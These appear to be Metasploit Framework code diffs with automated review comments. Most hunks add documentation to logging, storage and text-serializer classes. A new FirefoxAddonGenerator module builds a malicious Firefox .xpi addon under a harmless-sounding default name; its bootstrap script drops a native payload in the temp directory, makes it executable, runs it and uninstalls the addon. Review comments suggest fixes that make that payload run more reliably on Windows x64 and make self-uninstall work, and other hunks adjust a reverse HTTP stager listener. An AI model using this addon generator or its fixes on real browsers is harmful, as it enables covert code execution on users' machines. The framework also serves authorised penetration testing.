# Sets whether or not session logging is to be enabled.
#
# @param tf [Boolean] true if enabling. false if disabling.
# @return [void]
def self.enable_session_logging(tf)
@@session_logging = tf
end
#
# Returns whether or not session logging is enabled.
#
# @return [Boolean] true if enabled. false if disabled.
def self.session_logging_enabled?
@@session_logging || false
end
#
# Starts logging for a given session.
#
# @param session [Msf::Session] the session to start logging on.
# @return [void]
def self.start_session_log(session)
if (log_source_registered?(session.log_source) == false)
f = Rex::Logging::Sinks::Flatfile.new(
@ -82,9 +89,10 @@ class Logging
end
end
#
# Stops logging for a given session.
#
# @param session [Msf::Session] the session to stop logging.
# @return [Boolean] true if sucessful. false if not.
def self.stop_session_log(session)
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)
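Review bot: The @return tag on stop_session_log at the end of this hunk misspells its key word, `sucessful`; it should read `# @return [Boolean] true if successful. false if not.`. The same hunk documents disable_log_source as returning a Boolean, but the method only forwards whatever deregister_log_source returns, which is not visible here; if that helper can return nil, either say so in the tag or normalize with `!!deregister_log_source(src)`. stop_session_log's body continues outside the hunk.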


@ -1,24 +1,25 @@
# -*- coding: binary -*-
module Msf
###
#
# This class provides a generalized interface to persisting information,
# either in whole or in part, about the state of the framework. This can
# be used to store data that can later be reinitialized in a new instance
# of the framework or to provide a simple mechanism for generating reports
# of some form.
#
###
# @abstract Subclass and override {#initialize}, {#store}, and {#fetch}.
class PersistentStorage
@@storage_classes = {}
#
# Creates an instance of the storage class with the supplied name. The
# array supplied as an argument is passed to the constructor of the
# associated class as a means of generic initialization.
#
# @param name [String] the name of the storage class.
# @param params [Object] the parameters to give the new class.
# @return [PersistentStorage] the newly created class.
# @return [nil] if class has not been added through {.add_storage_class}.
def self.create(name, *params)
if (klass = @@storage_classes[name])
klass.new(*params)
@ -27,36 +28,42 @@ class PersistentStorage
end
end
#
# Stub initialization routine that takes the params passed to create.
#
# @param params [Object] the parameters to initialize with.
def initialize(*params)
end
#
# This methods stores all or part of the current state of the supplied
# framework instance to whatever medium the derived class implements.
# If the derived class does not implement this method, the
# NotImplementedError is raised.
#
# @param framework [Msf::Framework] framework state to store.
# @return [void] no implementation.
# @raise [NotImpementedError] raised if not implemented.
def store(framework)
raise NotImplementedError
end
#
# This method initializes the supplied framework instance with the state
# that is stored in the persisted backing that the derived class
# implements. If the derived class does not implement this method, the
# NotImplementedError is raised.
#
# @param framework [Msf::Framework] framework to restore state to.
# @return [void] no implementation.
# @raise [NotImplementedError] raised if not implemented.
def fetch(framework)
raise NotImplementedError
end
#
# This method adds a new storage class to the hash of storage classes that
# can be created through create.
#
# @param name [String] the name of the storage class.
# @param klass [PersistentStorage] the storage class to add.
# @return [void]
def self.add_storage_class(name, klass)
@@storage_classes[name] = klass
end


@ -2,30 +2,29 @@
module Msf
class PersistentStorage
###
#
# This class persists the state of the framework to a flatfile in a human
# readable format. At the moment, the level of information it conveys is
# rather basic and ugly, but this is just a prototype, so it will be improved.
# Oh yes, it will be improved.
#
###
class Flatfile < PersistentStorage
#
# Initializes the flatfile for storage based on the parameters specified.
# The hash must contain a FilePath attribute.
#
# @overload initialize(path)
# Initializes the flatfile with the set path.
# @param path [String] path of the flatfile.
def initialize(*params)
raise ArgumentError, "You must specify a file path" if (params.length == 0)
self.path = params[0]
end
#
# This method stores the current state of the framework in human readable
# form to a flatfile. This can be used as a reporting mechanism.
#
# @param framework [Msf:::Framework] the Framework to store.
# @return [void]
def store(framework)
# Open the supplied file path for writing.
self.fd = File.new(self.path, "w")
@ -41,10 +40,11 @@ protected
attr_accessor :fd, :path # :nodoc:
#
# This method stores general information about the current state of the
# framework instance.
#
# @param framework [Msf::Framework] the Framework to store.
# @return [void]
def store_general(framework)
fd.print(
"\n" +
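Review bot: The @param tag on store has an extra colon in the class name, `Msf:::Framework`; YARD links the type, so it should be `# @param framework [Msf::Framework] the Framework to store.` as on store_general below. The @overload on initialize documents a single path argument, but the constructor still accepts `*params` and silently ignores everything after params[0]; if no caller relies on extra arguments, tightening the check to `raise ArgumentError, "You must specify a file path" if params.length != 1` makes the documented contract the real one. store_general's body continues outside the hunk.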


@ -2,22 +2,22 @@
module Msf
module Serializer
###
#
# This class formats information in a plain-text format that
# is meant to be displayed on a console or some other non-GUI
# medium.
#
###
class ReadableText
#Default number of characters to wrap at.
DefaultColumnWrap = 70
#Default number of characters to indent.
DefaultIndent = 2
#
# Returns a formatted string that contains information about
# the supplied module instance.
#
# @param mod [Msf::Module] the module to dump information for.
# @param indent [String] the indentation to use.
# @return [String] formatted text output of the dump.
def self.dump_module(mod, indent = " ")
case mod.type
when MODULE_PAYLOAD
@ -37,9 +37,14 @@ class ReadableText
end
end
#
# Dumps an exploit's targets.
#
# @param mod [Msf::Exploit] the exploit module to dump targets
# for.
# @param indent [String] the indentation to use (only the length
# matters).
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_targets(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -57,9 +62,13 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps the exploit's selected target
#
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_target(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -75,9 +84,13 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps an auxiliary's actions
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -95,10 +108,14 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps the table of payloads that are compatible with the supplied
# exploit.
#
# @param exploit [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_compatible_payloads(exploit, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -116,9 +133,11 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps information about an exploit module.
#
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_exploit_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
@ -171,9 +190,11 @@ class ReadableText
end
#
# Dumps information about an auxiliary module.
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_auxiliary_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
@ -207,9 +228,11 @@ class ReadableText
return output
end
#
# Dumps information about a payload module.
#
# @param mod [Msf::Payload] the payload module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_payload_module(mod, indent = '')
# General
output = "\n"
@ -244,9 +267,11 @@ class ReadableText
return output
end
#
# Dumps information about a module, just the basics.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_basic_module(mod, indent = '')
# General
output = "\n"
@ -277,13 +302,16 @@ class ReadableText
end
#No current use
def self.dump_generic_module(mod, indent = '')
end
#
# Dumps the list of options associated with the
# supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_options(mod, indent = '')
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -309,9 +337,11 @@ class ReadableText
return tbl.to_s
end
#
# Dumps the advanced options associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_advanced_options(mod, indent = '')
output = ''
pad = indent
@ -333,9 +363,11 @@ class ReadableText
return output
end
#
# Dumps the evasion options associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_evasion_options(mod, indent = '')
output = ''
pad = indent
@ -358,6 +390,11 @@ class ReadableText
return output
end
# Dumps the references associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_references(mod, indent = '')
output = ''
@ -372,9 +409,13 @@ class ReadableText
output
end
#
# Dumps the contents of a datastore.
#
# @param name [String] displayed as the table header.
# @param ds [Msf::DataStore] the DataStore to dump.
# @param indent [Integer] the indentation size.
# @param col [Integer] the column width.
# @return [String] the formatted DataStore contents.
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent,
@ -392,9 +433,17 @@ class ReadableText
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
end
#
# Dumps the list of active sessions.
#
# @param framework [Msf::Framework] the framework to dump.
# @param opts [Hash] the options to dump with.
# @option opts :session_ids [Array] the list of sessions to dump (no
# effect).
# @option opts :verbose [Boolean] gives more information if set to
# true.
# @option opts :indent [Integer] set the indentation amount.
# @option opts :col [Integer] the column wrap width.
# @return [String] the formatted list of sessions.
def self.dump_sessions(framework, opts={})
ids = (opts[:session_ids] || framework.sessions.keys).sort
verbose = opts[:verbose] || false
@ -437,12 +486,14 @@ class ReadableText
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
end
#
# Dumps the list of running jobs.
#
# If verbose is true, also prints the payload, LPORT, URIPATH and start
# time, if they exist, for each job.
#
# @param framework [Msf::Framework] the framework.
# @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH
# and start time, if they exist, for each job.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the formatted list of running jobs.
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
columns = [ 'Id', 'Name' ]
@ -479,10 +530,13 @@ class ReadableText
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
end
#
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
# a bit to add indention
#
# @param str [String] the string to wrap.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the wrapped string.
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
return Rex::Text.wordwrap(str, indent, col)
end
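Review bot: The @option doc for :session_ids in dump_sessions says the option has "no effect", yet the first line of that method, `ids = (opts[:session_ids] || framework.sessions.keys).sort`, reads it; either the rest of the body (outside this hunk) ignores ids, in which case the dead read should go, or the doc is wrong and should read `# @option opts :session_ids [Array] the session IDs to dump; defaults to all active sessions.`. Also, dump_generic_module is now the only method in this class without a YARD block; since its body is empty, a one-line `# @return [nil] placeholder; no output is produced for generic modules.` would keep the doc coverage consistent. The method bodies between hunks are not visible here.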


@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm'
# WebApp
require 'msf/core/exploit/web'
# Firefox addons
require 'msf/core/exploit/remote/firefox_addon_generator'
require 'msf/core/exploit/remote/browser_exploit_server'


@ -92,6 +92,15 @@ module Msf
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
end
#
# Returns the absolute URL to the module's resource that points to on_request_exploit
#
# @return [String] absolute URI to the exploit page
#
def get_module_uri
"#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
end
#
# Returns the current target
#
@ -166,8 +175,10 @@ module Msf
# Special keys to ignore because the script registers this as [:activex] = true or false
next if k == :clsid or k == :method
if v.class == Regexp
if v.is_a? Regexp
bad_reqs << k if profile[k.to_sym] !~ v
elsif v.is_a? Proc
bad_reqs << k unless v.call(profile[k.to_sym])
else
bad_reqs << k if profile[k.to_sym] != v
end
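Review bot: The new Proc branch hands `profile[k.to_sym]` straight to the module-supplied lambda, and that value comes from whatever the target browser's client-side detection reported, so it can be nil or an arbitrary string; a Proc that calls a method on it or raises on nil would abort the whole requirement check and the request, whereas the Regexp branch above tolerates nil (`nil !~ v` is true). Treating a raising Proc as an unmet requirement keeps the two branches consistent, e.g. `ok = begin; v.call(profile[k.to_sym]); rescue StandardError; false; end` followed by `bad_reqs << k unless ok`; otherwise document in the module API that requirement Procs must accept nil. The enclosing method starts before this hunk.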


@ -0,0 +1,197 @@
# -*- coding: binary -*-
###
#
# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
# addon that will gain a session.
#
###
module Msf
module Exploit::Remote::FirefoxAddonGenerator
# for calling #generate_payload_exe
include Msf::Exploit::EXE
# Add in the supported datastore options
def initialize(info={})
super(update_info(info,
'Platform' => %w{ java linux osx solaris win },
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Universal (Javascript XPCOM Shell)',
{
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Windows x64 (Native Payload)',
{
'Platform' => 'windows',
'Arch' => ARCH_X64
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
],
[ 'Linux x64 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X64
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86
}
],
[ 'Mac OS X x64 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X64
}
]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('ADDONNAME', [ true, "The addon name.", "HTML5 Rendering Enhancements" ]),
OptBool.new('AutoUninstall', [ true,
"Automatically uninstall the addon after payload execution",
true
])
], self.class)
end
# @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
# 'application/x-xpinstall' MIME type
# @return nil if payload fails to generate
def generate_addon_xpi(cli)
if target.name =~ /Javascript/
payload_file = nil
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
payload_script = regenerate_payload(cli).encoded
else
payload_file = generate_payload_exe
return nil if payload_file.nil?
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
payload_script=%q|
var process=Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
process.init(tmp);
process.run(false,[],0);
|
if target.name != 'Windows x86 (Native Payload)'
payload_script = %q|
var chmod=Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
chmod.initWithPath("/bin/chmod");
var process=Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
process.init(chmod);
process.run(true, ["+x", tmp.path], 2);
| + payload_script
end
end
zip = Rex::Zip::Archive.new
bootstrap_script = 'function startup(data, reason) {'
xpi_guid = Rex::Text.rand_guid
if target.name !~ /Javascript/
bootstrap_script << %q|
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
|
bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
bootstrap_script << %Q|payload_name="#{payload_name}";|
bootstrap_script << %q|
file.append(xpi_guid);
file.append(payload_name);
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("TmpD", Components.interfaces.nsIFile);
tmp.append(payload_name);
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
file.copyTo(tmp.parent, tmp.leafName);
|
end
bootstrap_script << payload_script
if (datastore['AutoUninstall'])
bootstrap_script << %q|
function uninstallMe() {
try { // Fx < 4.0
Components.classes["@mozilla.org/extensions/manager;1"]
.getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
}
uninstallMe();
|
end
bootstrap_script << "}"
zip.add_file('bootstrap.js', bootstrap_script)
zip.add_file(payload_name, payload_file) unless payload_file.nil?
zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>#{xpi_guid}</em:id>
<em:name>#{datastore['ADDONNAME']}</em:name>
<em:version>1.0</em:version>
<em:bootstrap>true</em:bootstrap>
<em:unpack>true</em:unpack>
<em:targetApplication>
<Description>
<em:id>toolkit@mozilla.org</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>|)
zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="bootstrap.js"/>
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
</overlay>|)
zip
end
end
end
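Review bot: The chmod prelude guarded by `if target.name != 'Windows x86 (Native Payload)'` is also emitted for the 'Windows x64 (Native Payload)' target, so on that target bootstrap.js calls `chmod.initWithPath("/bin/chmod")`, which does not exist on Windows, and the dropped payload is never launched; keying on the platform name, `unless target.name =~ /^Windows/`, covers both Windows targets. Second, `xpi_guid="…"` is only written into the script inside the `if target.name !~ /Javascript/` branch, yet uninstallMe references xpi_guid for every target, so for the default JavaScript XPCOM target both uninstall calls throw ReferenceError, the empty `catch (e) {}` blocks swallow it, and AutoUninstall silently does nothing; moving `bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|` above that `if` fixes it. Third, `tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666)` drops the native payload world-writable in the temp directory before it is chmod'ed and executed, which lets any other local user swap the binary in that window; `0600` is sufficient since the same profile copies and runs it. Finally, `datastore['ADDONNAME']` is interpolated unescaped into install.rdf, so a name containing `&` or `<` yields a malformed manifest and a failed install; XML-escape it or restrict it to a safe character set.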


@ -166,7 +166,7 @@ module BindTcp
socks[0].extend(Rex::Socket::Tcp)
socks[1].extend(Rex::Socket::Tcp)
m = OpenSSL::Digest::Digest.new('md5')
m = OpenSSL::Digest.new('md5')
m.reset
key = m.digest(datastore["AESPassword"] || "")


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
require 'msf/core/handler/reverse_http/uri_checksum'
module Msf
module Handler
@ -13,6 +14,7 @@ module Handler
module ReverseHttp
include Msf::Handler
include Msf::Handler::ReverseHttp::UriChecksum
#
# Returns the string representation of the handler type
@ -29,46 +31,6 @@ module ReverseHttp
"tunnel"
end
#
# Define 8-bit checksums for matching URLs
# These are based on charset frequency
#
URI_CHECKSUM_INITW = 92
URI_CHECKSUM_INITJ = 88
URI_CHECKSUM_CONN = 98
#
# Precalculated checkums as fallback
#
URI_CHECKSUM_PRECALC = [
"Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp",
"cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt",
"E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby",
"tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563",
"0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg",
"U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E",
"KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2",
"1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ",
"HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg",
"J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1",
"k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5",
"bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I",
"YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ",
"KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC",
"CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ",
"2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5",
"Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi",
"iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP",
"eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA",
"oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL",
"dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS",
"BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t",
"7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG",
"kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM",
"aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg",
"zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"
]
#
# Use the +refname+ to determine whether this handler uses SSL or not
#
@ -83,52 +45,12 @@ module ReverseHttp
# addresses.
#
def full_uri
addrs = bind_address
local_port = bind_port
scheme = (ssl?) ? "https" : "http"
"#{scheme}://#{addrs[0]}:#{local_port}/"
"#{scheme}://#{datastore['LHOST']}:#{datastore['LPORT']}/"
end
#
# Map "random" URIs to static strings, allowing us to randomize
# the URI sent in the first request.
#
def process_uri_resource(uri_match)
# This allows 'random' strings to be used as markers for
# the INIT and CONN request types, based on a checksum
uri_strip, uri_conn = uri_match.split('_', 2)
uri_strip.sub!(/^\//, '')
uri_check = Rex::Text.checksum8(uri_strip)
# Match specific checksums and map them to static URIs
case uri_check
when URI_CHECKSUM_INITW
uri_match = "/INITM"
when URI_CHECKSUM_INITJ
uri_match = "/INITJM"
when URI_CHECKSUM_CONN
uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) )
end
uri_match
end
#
# Create a URI that matches a given checksum
#
def generate_uri_checksum(sum)
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
32.times do
uri = Rex::Text.rand_text_alphanumeric(3)
chk.sort_by {rand}.each do |x|
return(uri + x) if Rex::Text.checksum8(uri + x) == sum
end
end
# Otherwise return one of the pre-calculated strings
return URI_CHECKSUM_PRECALC[sum]
end
#
# Initializes the HTTP SSL tunneling handler.
@ -175,12 +97,18 @@ module ReverseHttp
end
local_port = bind_port
addrs = bind_address
# Determine where to bind the HTTP(S) server to
bindaddrs = ipv6 ? '::' : '0.0.0.0'
if not datastore['ReverseListenerBindAddress'].to_s.empty?
bindaddrs = datastore['ReverseListenerBindAddress']
end
# Start the HTTPS server service on this host/port
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
local_port,
addrs[0],
bindaddrs,
ssl?,
{
'Msf' => framework,
@ -202,7 +130,9 @@ module ReverseHttp
},
'VirtualDirectory' => true)
print_status("Started HTTP#{ssl? ? "S" : ""} reverse handler on #{full_uri}")
scheme = (ssl?) ? "https" : "http"
bind_url = "#{scheme}://#{bindaddrs}:#{local_port}/"
print_status("Started #{scheme.upcase} reverse handler on #{bind_url}")
end
#
@ -404,27 +334,6 @@ protected
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end
end
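Review bot: The listener now binds to the wildcard address (`bindaddrs = ipv6 ? '::' : '0.0.0.0'`) whenever ReverseListenerBindAddress is unset, where the removed bind_address tried LHOST first and fell back to ANY only if that bind failed; on a multi-homed or shared operator host this exposes the stager endpoint on every interface by default, so it is worth stating in the ReverseListenerBindAddress option description, or defaulting to LHOST when it resolves to a local address. The `ipv6` predicate on that line is not defined anywhere in this hunk; if it is not provided elsewhere in the module, handler start will raise NameError. Also, full_uri now interpolates `datastore['LHOST']` verbatim, so an IPv6 LHOST is emitted without the brackets a URL host literal requires; wrap it, e.g. `host = Rex::Socket.is_ipv6?(datastore['LHOST']) ? "[#{datastore['LHOST']}]" : datastore['LHOST']`, if that helper is available. The method containing the bind logic starts before its hunk.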


@ -0,0 +1,90 @@
module Msf
module Handler
module ReverseHttp
module UriChecksum
#
# Define 8-bit checksums for matching URLs
# These are based on charset frequency
#
URI_CHECKSUM_INITW = 92
URI_CHECKSUM_INITJ = 88
URI_CHECKSUM_CONN = 98
#
# Precalculated checkums as fallback
#
URI_CHECKSUM_PRECALC = [
"Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp",
"cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt",
"E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby",
"tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563",
"0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg",
"U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E",
"KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2",
"1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ",
"HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg",
"J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1",
"k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5",
"bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I",
"YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ",
"KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC",
"CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ",
"2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5",
"Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi",
"iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP",
"eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA",
"oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL",
"dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS",
